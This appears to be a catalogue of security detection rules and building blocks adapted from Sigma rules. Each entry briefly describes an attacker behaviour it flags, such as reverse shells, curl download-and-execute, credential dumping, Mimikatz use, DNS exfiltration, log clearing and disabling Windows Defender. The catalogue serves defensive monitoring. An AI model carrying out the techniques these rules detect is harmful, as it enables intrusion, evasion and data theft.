Building Block BB:BehaviorDefinition: Suspicious Activity in Shell Commands detects suspicious shell commands used in various code exploits. Based on the Suspicious Activity in Shell Commands Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Atbroker Execution Detects Atbroker executing non-default Assistive Technology applications. Based on the Suspicious Atbroker Execution Sigma rule by Mateusz Wydra, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Cabinet File Expansion Detects the use of built-in expand utility to decompress cab files. Based on the Suspicious Cabinet File Expansion Sigma rule by Bhabesh Raj.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Commands Linux Detects relevant commands often related to malware or hacking activity. Based on the Suspicious Commands Linux Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Delete Command detects suspicious command line to remove exe or dll. Based on the Greedy File Deletion Using Del Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Eventlog Cleared via PowerShell Detects clearing of eventlogs using PowerShell. Based on the Suspicious Eventlog Clear or Configuration Change Sigma rule by Ecco, Daniil Yugoslavskiy, oscd.community, and D3F7A5105.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Eventlog Cleared via WMIC Detects clearing of eventlogs using wmic. Based on the Suspicious Eventlog Clear or Configuration Change Sigma rule by Ecco, Daniil Yugoslavskiy, oscd.community, and D3F7A5105.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Eventlog Cleared via Wevtutil Detects clearing of eventlogs using wevtutil. Based on the Suspicious Eventlog Clear or Configuration Change Sigma rule by Ecco, Daniil Yugoslavskiy, oscd.community, and D3F7A5105.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Group And Account Reconnaissance Activity Using Net.EXE Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE. Based on the Suspicious Group And Account Reconnaissance Activity Using Net.EXE Sigma rule by Florian Roth (Nextron Systems), omkar72, @svch0st, and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Load DLL and Extexport Execution Detects when a user installs certificates by using CertOC.exe to loads the target DLL file. This also detects Extexport.exe loads DLL and is execute from other folder the original path. Based on the Suspicious Extexport Execution Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Load of Advapi31 detects the load of advapi31.dll by a process running in an uncommon folder. Based on the Suspicious Load of Advapi31.dll Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Loaders Detects different loaders used by the Lazarus group activity. Based on the Lazarus Loaders Sigma rule by Florian Roth, and wagga.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Net Execution Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet. Based on the Net.exe Execution Sigma rule by Michael Haag, Mark Woan (improvements), James Pemberton, @4A616D6573, and oscd.community (improvements).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Obfuscation Character in Commandline Detects possible payload obfuscation via the command line. Based on the Suspicious Dosfuscation Character in Commandline Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Registration via cscript Detects the registration of a VSS/VDS Provider as a COM+ application.
Building Block BB:BehaviorDefinition: Suspicious Remote Logon with Explicit Credentials Detects suspicious processes logging on with explicit credentials.
Building Block BB:BehaviorDefinition: Suspicious Reverse Shell Command Line detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell. Based on the Suspicious Reverse Shell Command Line Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Script Execution From Temp Folder Detects a suspicious script executions from temporary folder. Based on the Suspicious Script Execution From Temp Folder Sigma rule by Florian Roth, Max Altgelt, and Tim Shelton.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious ZipExec Execution Detects the use of ZipExec which is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. Based on the Suspicious ZipExec Execution Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Svchost Incoming Connection Detects suspicious incoming connections to the svchost.exe process.
Building Block BB:BehaviorDefinition: Sysinternals SDelete File Deletion Detects the deletion of files by Sysinternals SDelete. Based on the File Deleted Via Sysinternals SDelete Sigma rule by Roberto Rodriguez (Cyb3rWard0g), and OTR (Open Threat Research).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Sysmon Driver Unload Detects possible Sysmon driver unload. Based on the Sysmon Driver Unload Sigma rule by Kirill Kiryanov, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: TaskCache Registry Modification detects suspicious registry modifications to the TaskCache key. Based on the Scheduled TaskCache Change by Uncommon Program Sigma rule by Syed Hasan (@syedhasan009).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Terminal Server Client Connection History Cleared - Registry Detects the deletion of registry keys containing the MSTSC connection history. Based on the Terminal Server Client Connection History Cleared - Registry Sigma rule by Christian Burkard (Nextron Systems).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Turla Group Lateral Movement Detects automated lateral movement by Turla group. Based on the Turla Group Lateral Movement Sigma rule by Markus Neis.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Turla LightNeuron Installation Triggers when a Turla LightNeuron is installed.
Building Block BB:BehaviorDefinition: Turla LightNeuron Objects Triggers when a Turla LightNeuron object is loaded.
Building Block BB:BehaviorDefinition: User Added to Local Administrators Detects user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity.
Building Block BB:BehaviorDefinition: User Agent Changed via Curl Detects a suspicious curl process start with user agent. Based on the Suspicious Curl Change User Agents - Linux Sigma rule by Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: User Agent Changed via Powershell Detects embedding of suspicious commands into a user agent. Based on the Change User Agents with WebRequest Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: WinDbg/CDB LOLBIN Usage and Application Whitelisting Bypass via Dxcap.exe Detects execution of Dxcap.exe and also detects usage of cdb.exe to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file. Based on the WinDbg/CDB LOLBIN Usage Sigma rule by Beyu Denis, oscd.community, and Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Windows Shell/Scripting Processes Spawning Suspicious Programs Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, and mshta. Based on the Windows Shell/Scripting Processes Spawning Suspicious Programs Sigma rule by Florian Roth (Nextron Systems), and Tim Shelton.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Windows Software Discovery Triggers when windows software is discovered. Based on the Detected Windows Software Discovery Sigma rule by Nikita Nazarov, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Windows Software Discovery - PowerShell Triggers when windows software is discovered. Based on the Detected Windows Software Discovery - PowerShell Sigma rule by Nikita Nazarov, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Windows Spooler Service Binary Load Detects DLL Load from Spooler Service backup folder. Based on the Windows Spooler Service Suspicious Binary Load Sigma rule by FPT.EagleEye, and Thomas Patzke (improvements).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Windows Spooler Service File Deletion Detect DLL deletions from Spooler Service driver folder. Based on the Windows Spooler Service Suspicious File Deletion Sigma rule by Bhabesh Raj.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Windows Update Client LOLBIN Detects code execution via the Windows Update client. Based on the Windows Update Client LOLBIN Sigma rule by FPT.EagleEye Team.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Write Protect For Storage Disabled Detects changes to registry to disable any write-protect property for storage devices. Based on the Write Protect For Storage Disabled Sigma rule by Sreeman.

Used under Detection Rule License 1.1.

Building Block BB:CategoryDefinition: File Permission Changed Defines when a command has been executed to change the permissions assigned to a file.
Building Block BB:CategoryDefinition: Object Download Events Edit this Building Block to include all object (file, folder, etc) download related event categories.
Building Block BB:DeviceDefinition: Endpoint Devices Defines Endpoint devices on system.
Rule Access Token Abuse Detects token impersonation and theft. Based on the Access Token Abuse Sigma rule by Michaela Adams, and Zach Mathis.

Used under Detection Rule License 1.1.

Rule Access to ADMIN$ Share Detects access to $ADMIN share. Based on the Access to ADMIN$ Share Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Rule Active Directory Group/Computer Enumeration Triggers when a group or a computer is enumerated within Active Directory. Based on the Active Directory Group Enumeration With Get-AdGroup and Active Directory Computers Enumeration with Get-AdComputer Sigma rules by frack113.

Used under Detection Rule License 1.1.

Rule Active Directory Kerberos DLL Loaded Via Office Application Detects Kerberos DLL being loaded by a Microsoft Office product. Based on the Active Directory Kerberos DLL Loaded Via Office Application Sigma rule by Antonlovesdnb.

Used under Detection Rule License 1.1.

Rule Active Directory Parsing DLL Loaded Via Office Application Detects DSParse DLL being loaded by a Microsoft Office product. Based on the Active Directory Parsing DLL Loaded Via Office Application Sigma rule by Antonlovesdnb.

Used under Detection Rule License 1.1.

Rule Alternate Data Streams Writing Files Detects Alternate Data Stream (ADS) writing files. ADS may be used to store configuration files. Based on the NTFS Alternate Data Stream Sigma rule by Sami Ruohonen.

Used under Detection Rule License 1.1.

Rule Attempt to bypass UAC via Windows Firewall Snap-In Hijacking Detects attempts to bypass UAC via Windows firewall snap-in.

For more information about this attack, see UAC Bypass via Windows Firewall Snap-In Hijack.

Rule Automated Collection Commands Detects an adversary using automated techniques for collecting internal data.
Rule CLR DLL Loaded Via Office Application Detects CLR DLL being loaded by a Microsoft Office product. Based on the CLR DLL Loaded Via Office Applications Sigma rule by Antonlovesdnb.

Used under Detection Rule License 1.1.

Rule CLR DLL Loaded Via Scripting Applications Detects CLR DLLs being loaded by scripting applications. Based on the DotNet CLR DLL Loaded By Scripting Applications Sigma rule by omkar72, and oscd.community.

Used under Detection Rule License 1.1.

Rule COM Hijacking With Suspicious Locations Detects potential COM hijacking where the 'Server' (In/Out) is pointing to a suspicious location. Based on the COM Hijacking For Persistence With Suspicious Locations Sigma rule by Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Rule COM Hijacking via Sdclt Detects potential COM hijacking via Sdclt. Based on the COM Hijack via Sdclt Sigma rule by Omkar Gudhate.

Used under Detection Rule License 1.1.

Rule COM Object Downloading Cradles Detects usage of COM objects that can be abused to download files in PowerShell by CLSID. Based on the Potential COM Objects Download Cradles Usage - PS Script Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Certutil Initiated Connection Detects a network connection intitiated by the certutil.exe tool. Attackers can abuse certutil.exe to download malware or offensive security tools. Based on the Certutil Initiated Connection Sigma rule by frack113, and Florian Roth.

Used under Detection Rule License 1.1.

Rule Clear Command History Detects clear command history activity.
Rule ComRat Registry Service Installation Triggers when a comrat service is installed and a payload is written into the registry. This could indicate an existing access such as compromised credentials or a previously installed backdoor.
Rule Command Executed via SettingContent-ms Detects command executed via SettingContent-ms. Based on the Arbitrary Shell Command Execution Via Settingcontent-Ms Sigma rule by Sreeman.

Used under Detection Rule License 1.1.

Rule Command Line Execution with Suspicious URL and AppData Strings Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers. Based on the Command Line Execution with Suspicious URL and AppData Strings Sigma rule by Florian Roth, Jonhnathan Ribeiro, and oscd.community.

Used under Detection Rule License 1.1.

Rule Communication to EquationGroup C2 Tools Detects communications to C2 servers. Based on the Equation Group C2 Communication Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Rule Copying Sensitive Files with Credential Data Detects attempts to copy sensitive files with credential data. Based on the Copying Sensitive Files with Credential Data Sigma rule by Teymur Kheirkhabarov, Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Rule Creation of Outlook C2 Macro File Detects creation of an Outlook C2 macro file. Based on the Outlook C2 Macro Creation Sigma rule by @ScoubiMtl.

Used under Detection Rule License 1.1.

Rule Creation of Suspicious Executable Files Detects creation of suspicious executable files. Based on the Suspicious Executable File Creation Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Creation or Modification of Assistive Technology Applications Detects creation or modification of Assistive Technology applications. Based on the Atbroker Registry Change Sigma rule by Mateusz Wydra, and oscd.community.

Used under Detection Rule License 1.1.

Rule Creation or Modification of a new GPO Scheduled Task or Service Detects the creation or modification of a new Group Policy based scheduled task or service. Based on the Persistence and Execution at Scale via GPO Scheduled Task Sigma rule by Samir Bousseaden.

Used under Detection Rule License 1.1.

Rule Credential Dumping Tools Named Pipes Detects well-known credential dumping tools execution via specific named pipes. Based on the Cred Dump-Tools Named Pipes Sigma rule by Teymur Kheirkhabarov, and oscd.community.

Used under Detection Rule License 1.1.

Rule Curl Download And Execute Combination Detects potential attackers using curl to download payloads remotely and execute them. Based on the Curl Download And Execute Combination Sigma rule by Sreeman, and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule DNS Exfiltration Tools Execution Detects DNS exfiltration tool execution. Based on the DNS Exfiltration and Tunneling Tools Execution Sigma rule by Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Rule DNS Exfiltration in Powershell Detects detects DNS exfiltration in powershell. Based on the Powershell DNSExfiltration Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule DNS HybridConnectionManager Service Bus Detects Hybrid Connection Manager querying the service bus. Based on the DNS HybridConnectionManager Service Bus Sigma rule by Roberto Rodriguez (Cyb3rWard0g), and OTR (Open Threat Research).

Used under Detection Rule License 1.1.

Rule DarkSide Ransomware Activity Detected Detects DarkSide ransomware activity. Based on the DarkSide Ransomware Pattern Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Rule Data Split into Pieces (Mac) Detects data split into pieces. Based on the Split A File Into Pieces Sigma rule by Igor Fits, Mikhail Larin, and oscd.community.

Used under Detection Rule License 1.1.

Rule Data Split into Pieces (Unix) Detects data split into pieces. Based on the Split A File Into Pieces - Linux Sigma rule by Igor Fits, and oscd.community.

Used under Detection Rule License 1.1.

Rule Default Accounts Used Detects default accounts used. Based on the Suspicious Manipulation Of Default Accounts Sigma rule by Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Rule Disable Windows Defender Functionalities Via Registry Keys Detects when attackers disable Windows Defender functionality by using the Windows registry. Based on the Disable Windows Defender Functionalities Via Registry Keys Sigma rule by AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, and Swachchhanda Shrawan Poudel.

Used under Detection Rule License 1.1.

Rule Disabled CrashDump via Registry Detects CrashDump disabled through registry modification. Based on the CrashControl CrashDump Disabled Sigma rule by Tobias Michalski.

Used under Detection Rule License 1.1.

Rule Dllhost Outbound Network Connection Detects outbound connections initiated by dllhost.exe.
Rule Dllhost.exe Execution Anomaly Detects the dllhost.exe process spawning with no command line arguments which is rare and could indicate process injection activity or malware mimicking similar system processes. Based on the Dllhost.EXE Execution Anomaly Sigma rule by Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Domain Trust Discovery Detects execution of nltest.exe and dsquery.exe for domain trust discovery. This technique is used by attackers to enumerate Active Directory trusts. Based on the Domain Trust Discovery Sigma rule by E.M. Anhaus (originally from Atomic Blue Detections), Tony Lambert, oscd.community, and omkar72.

Used under Detection Rule License 1.1.

Rule DotNET DLL Loaded Via Office Application Detects any assembly DLL being loaded by a Microsoft Office product. Based on the DotNET Assembly DLL Loaded Via Office Application Sigma rule by Antonlovesdnb.

Used under Detection Rule License 1.1.

Rule Download Payload Using Edge Headless Feature Detects downloading of payloads using the Edge headless feature. Based on the Potential Arbitrary File Download Via MSEdge.EXE Sigma rule by Florian Roth (Nextron Systems), and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Download Payload via Console Using Edge Detects downloading of payloads using the Edge console. Based on the Edge abuse for payload download via console Sigma rule by mdecrevoisier.

Used under Detection Rule License 1.1.

Rule Dump Credentials from Windows Credential Manager With PowerShell Detects adversaries searching for common password storage locations to obtain user credentials. Based on the Dump Credentials from Windows Credential Manager With PowerShell Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule ETW Trace Disabled Detects a command that clears or disables any ETW trace log which could indicate a logging evasion. Based on the Disable of ETW Trace Sigma rule by @neu5ron, Florian Roth, Jonhnathan Ribeiro, and oscd.community.

Used under Detection Rule License 1.1.

Rule Email Account Discovery from Powershell Detects email account discovery from Powershell.
Rule Encrypted Channel Activity Detects encrypted channel activity. Based on the Suspicious SSL Connection Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Enumerate Credentials from Windows Credential Manager With PowerShell Detects adversaries searching for common password storage locations to obtain user credentials.
Rule Excessive Number of nslookup from Powershell Detects excessive number of nslookup from Powershell. Based on the Nslookup PowerShell Download Cradle - ProcessCreation Sigma rule by Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Executable File Created by another Executable Triggers when an executable is created by another executable. Based on the Creation of an Executable by an Executable Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Execution of Dnscat Detects execution of Dnscat. Based on the Dnscat Execution Sigma rule by Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Rule Execution of Exfiltration and Tunneling Tools Detects execution of exfiltration and tunneling tools. Based on the Exfiltration and Tunneling Tools Execution Sigma rule by Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Rule Execution of Non-DLL Using Rundll32 Detects rundll32.exe running non-DLL. Based on the Suspicious Rundll32 Execution With Image Extension Sigma rule by Hieu Tran.

Used under Detection Rule License 1.1.

Rule Execution of Tap Installer Software Detects execution of Tap Installer software. Based on the Tap Installer Execution Sigma rule by Daniil Yugoslavskiy, Ian Davis, and oscd.community.

Used under Detection Rule License 1.1.

Rule Exploitation of EQNEDT32 Detects CVE-2017-11882 which is an exploitation of EQNEDT32.EXE to spawn other processes. Based on the Droppers Exploiting CVE-2017-11882 Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Rule File Creation by Non-Privileged Processes in Program Files Directory Detects file creation by non-privileged processes in the Program Files directory. Based on the Files Dropped to Program Files by Non-Priviledged Process Sigma rule by Teymur Kheirkhabarov (idea), Ryan Plas (rule), and oscd.community.

Used under Detection Rule License 1.1.

Rule File Download Via Bitsadmin Detects usage of bitsadmin downloading a file. Based on the File Download Via Bitsadmin Sigma rule by Michael Haag, and FPT.EagleEye.

Used under Detection Rule License 1.1.

Rule File and Directory Permission Modification (Windows) Detects file and directory permission modification in Windows. Based on the File or Folder Permissions Modifications Sigma rule by Jakob Weinzettl, oscd.community, and Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Rule File and Directory Permission Modification after Download Detects file and directory permission modification after file download event.
Rule Finger Suspicious Invocation Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays. Based on the Finger.exe Suspicious Invocation Sigma rule by Florian Roth (Nextron Systems), omkar72, and oscd.community.

Used under Detection Rule License 1.1.

Rule GAC DLL Loaded Via Office Application Detects any GAC DLL being loaded by a Microsoft Office product. Based on the GAC DLL Loaded Via Office Applications Sigma rule by Antonlovesdnb.

Used under Detection Rule License 1.1.

Rule Get-ADUser User Discovery and Export Triggers when usage of the Get-ADUser cmdlet to collect user information and output it to a file. Based on the User Discovery And Export Via Get-ADUser Cmdlet - PowerShell Sigma rule by Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Google Chrome DLL Sideloading Detects DLL sideloading in Google Chrome. Based on the Potential Chrome Frame Helper DLL Sideloading Sigma rule by Nasreddine Bencherchali (Nextron Systems), and Wietze Beukema (project and research).

Used under Detection Rule License 1.1.

Rule Hiding Files with Attrib Detects usage of attrib.exe to hide files from users. Based on the Hiding Files with Attrib.exe Sigma rule by Sami Ruohonen.

Used under Detection Rule License 1.1.

Rule Hybrid Connection Manager Service Installation Detects Hybrid Connection Manager service installation. Based on the HybridConnectionManager Service Installation Sigma rule by Roberto Rodriguez (Cyb3rWard0g), and OTR (Open Threat Research).

Used under Detection Rule License 1.1.

Rule In-memory PowerShell Detects loading of essential DLLs used by PowerShell, but not by the process Powershell.exe. Based on the In-memory PowerShell Sigma rule by Tom Kern, oscd.community, Natalia Shornikova, and Tim Shelton.

Used under Detection Rule License 1.1.

Rule Input Capture Using Mouse Lock Detects input capture using mouse lock tool. Based on the Mouse Lock Credential Gathering Sigma rule by Cian Heasley.

Used under Detection Rule License 1.1.

Rule Linux Doas Tool Execution Detects Linux doas tool execution. Based on the Linux Doas Tool Execution Sigma rule by Sittikorn S, and Teoderick Contreras.

Used under Detection Rule License 1.1.

Rule Lookup System Locale Detects looking up system locale. Based on the Console CodePage Lookup Via CHCP Sigma rule by _pete_0, and TheDFIRReport.

Used under Detection Rule License 1.1.

Rule Malicious Base64 in Registry Detects registry write modifications where an adversary attempts to hide encoded commands. Based on the Suspicious Environment Variable Has Been Registered Sigma rule by Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Rule Malicious Named Pipe Triggers when a named pipe is created by known APT malware.
Rule Malicious PowerShell Scripts Detects the creation of known Powershell scripts for exploitation. Based on the Malicious PowerShell Scripts - FileCreation Sigma rule by Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, and Georg Lauenstein.

Used under Detection Rule License 1.1.

Rule Malicious Use of Control Panel Detects malicious use of control panel items. Based on the Control Panel Items by Kyaw Min Thein, and Furkan Caliskan (@caliskanfurkan_).

Used under Detection Rule License 1.1.

Rule Masquerading Task or Service Triggers when task or service masquerading.
Rule Microsoft Binary Github Communication Detects an executable in the Windows folder accessing github.com. Based on the Microsoft Binary Github Communication Sigma rule by Michael Haag (idea), Florian Roth (rule).

Used under Detection Rule License 1.1.

Rule Microsoft Binary Suspicious Communication Endpoint Detects an executable in the Windows folder accessing suspicious domains. Based on the Microsoft Binary Suspicious Communication Endpoint Sigma rule by Florian Roth (Nextron Systems), and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Microsoft Office DLL Sideloading Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location. Based on the Microsoft Office DLL Sideload Sigma rule by Nasreddine Bencherchali (Nextron Systems), and Wietze Beukema (project and research).

Used under Detection Rule License 1.1.

Rule Microsoft Office Template Creation Detects the creation of template files for Microsoft Office from outside Office.
Rule Mimikatz Execution Detects well-known Mimikatz command line arguments. Based on the HackTool - Mimikatz Execution by Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), and Tim Shelton.

Used under Detection Rule License 1.1.

Rule Multiple Login Failures due to Bad Password Detects adversary performing password spraying.
Rule Network Share Discovery Activity Detects network share discovery activity.
Rule Network Sniffing Activity Detects network sniffing activities. Based on the Network Sniffing Sigma rule by Timur Zinniatullin and oscd.community.

Used under Detection Rule License 1.1.

Rule New Certificate Added to Certificate Store Detects the addition of new root, CA or AuthRoot certificates to the Windows registry. Based on the New Root or CA or AuthRoot Certificate to Store Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule New Port Forwarding Rule Added Via Netsh Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule. Based on the New Port Forwarding Rule Added Via Netsh.EXX Sigma rule by Florian Roth (Nextron Systems), omkar72, oscd.community, and Swachchhanda Shrawan Poudel.

Used under Detection Rule License 1.1.

Rule New Service Creation Detects the creation of a new service.
Rule Non-Standard Port Usage Detects non-standard port usage. Based on the Suspicious Typical Malware Back Connect Ports Sigma rule by Florian Roth (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Outlook C2 Macro Creation Detects detects the creation of a macro file for Outlook. Based on the Outlook C2 Macro Creation Sigma rule by @ScoubiMtl.

Used under Detection Rule License 1.1.

Rule Outlook Security Settings Changed in Registry Detects changing in Outlook email security settings. Based on the Change Outlook Security Setting in Registry Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Pass the Hash Activity Detects the attack technique pass the hash which is used to move laterally inside the network.
Rule Persistence Registry Key for Recycle Bin Detects persistence registry key for recycle bin. Based on the Registry Persistence Mechanisms in Recycle Bin Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Persistence and Execution at Scale via GPO Scheduled Task Detects lateral movement using GPO scheduled task. Based on the Persistence and Execution at Scale via GPO Scheduled Task Sigma rule by Samir Bousseaden.

Used under Detection Rule License 1.1.

Rule Persistence via Services Registry Key Detects an adversary attempting to persist via service creation or modification of an existing service. Based on the ServiceDll Hijack Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Persistence via Startup Folder Detects when a file with a suspicious extension is created in the startup folder. Based on the Suspicious Startup Folder Persistence Sigma rule by Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Rule Phishing Patterns in ISO Archive Detects when an ISO file is opened with archive applications. Based on the Phishing Pattern ISO in Archive Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Rule Possible Brute Force Attempt Detects adversary performing brute force.
Rule Possible Turla LightNeuron Backdoor Installation Triggers when a Turla LightNeuron Backdoor is installed. LightNeuron targets Microsoft Exchange email servers making use of the Transport Agent.

Used under Detection Rule License 1.1.

Rule Potential Archive of Collected Data Triggers when data is archived or compressed for exfiltration. An adversary may compress data, such as sensitive documents, that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
Rule Potential Boot or Logon Initialization Scripts Detects triggers when a modification is made to Windows logon scripts to initialize boot or logon scripts.
Rule Potential C2 Communication over a Non-Application Layer Protocol Detects adversaries using a non-application layer protocol for communication between host and C2 server or among infected hosts within a network.
Rule Potential Carbon Activity Detects Carbon activity which communicates with the C&C server to exfiltrate data.
Rule Potential ComRAT Activity Detects ComRAT activity that is a powershell loader to create scheduled tasks.
Rule Potential Command and Scripting Interpreters Triggers when a command and scripting interpreters are detected.
Rule Potential Configuration And Service Reconnaissance Detects reconnaissance attempts from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software. Based on the Query Registry Sigma rule by Timur Zinniatullin, oscd.community.

Used under Detection Rule License 1.1.

Rule Potential Crutch Activity Detects Crutch activity which encrypts and exfiltrates data.
Rule Potential DLL Injection Pattern Detected Detects potential use of CreateRemoteThread API and LoadLibrary function to inject a DLL into a process. Based on the CreateRemoteThread API and LoadLibrary by Roberto Rodriguez @Cyb3rWard0g.

Used under Detection Rule License 1.1.

Rule Potential DLL Search Order Hijacking Triggers when attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking. Based on the Potential Initial Access via DLL Search Order Hijacking Sigma rule by Tim Rauch (rule), and Elastic (idea).

Used under Detection Rule License 1.1.

Rule Potential Data Exfiltration Via Curl Detects the execution of the curl process with upload flags. Which might indicate potential data exfiltration. Based on the Suspicious Curl File Upload Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Rule Potential Empire Activity Detects Empire activity which hijacks Microsoft Outlook to exfiltrate data over mail.
Rule Potential Epic Activity Detects Turla Epic activity which searches for various terms within the victim system.
Rule Potential Exchange Exploit Activity Detected Detects potential Exchange exploit activity. Based on the Exchange Exploitation Activity Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Rule Potential File and Directory Discovery Triggers when a file or directory is searched for information discovery. An adversary may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
Rule Potential Flow of Execution Hijack Triggers when a DLL is loaded or deleted from a suspicious folder or file.
Rule Potential Gazer Activity Detects Turla Gazer activity which is a backdoor that uses various techniques for persistence.
Rule Potential Hidden File or Directory Triggers when a file or directory attributes are changed or modified to hide artifacts from users.
Rule Potential HyperStack Activity Detects Turla HyperStack activity, which is a backdoor.
Rule Potential Indicator Removal Activity on Host Triggers when an adversary delete or modify artifacts generated on a host system to remove evidence of their presence or hinder defenses.
Rule Potential Ingress Tool Transfer Detects a suspicious call to Invoke-WebRequest, curl or wget where the and output is located in a suspicious location. Based on the Suspicious Invoke-WebRequest Usage Sigma rule by Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Rule Potential Kazuar Activity Detects Kazuar activity that is a shortcut creation and a sub-key added under HKCU registry path.
Rule Potential LOLBIN Activity Triggers when LOLBIN is used to execute code for a specified binary.
Rule Potential Lateral Movement via PowerShell Detects a PowerShell process spawned as a child or grand child process of commonly abused processes during lateral movement. Based on the Possible Lateral Movement PowerShell Spawn Sigma rule by Mauricio Velazco, and Splunk.

Used under Detection Rule License 1.1.

Rule Potential MSExchange Mailbox Export Triggers when an exchange mailbox data is exported to a file.
Rule Potential Malicious MSExchange Transport Agent Installation Detects the installation of an Exchange Transport Agent.
Rule Potential Mosquito Activity Detects Mosquito activity, which is a Win32 backdoor.
Rule Potential PowerShell ReverseShell Connection Detects usage of the 'TcpClient' class. Which can be abused to establish remote connections and reverse-shells. Based on the Potential Powershell ReverseShell Connection Sigma rule by FPT.EagleEye, wagga, and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Potential Proxy Forwarding Configuration Triggers when a proxy port is configured to be used in forwarding. Adversaries may configure proxy ports to bypass network restrictions through tunneling.
Rule Potential Registry or Environment Variable Unload Triggers when changes are made to environment variables or registry. This could indicate a precursor to a ransomware attack.
Rule Potential Scheduled Task Created Detects scheduled tasks created.
Rule Potential Security Software Discovery Triggers when a security software is discovered. Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-viruses.
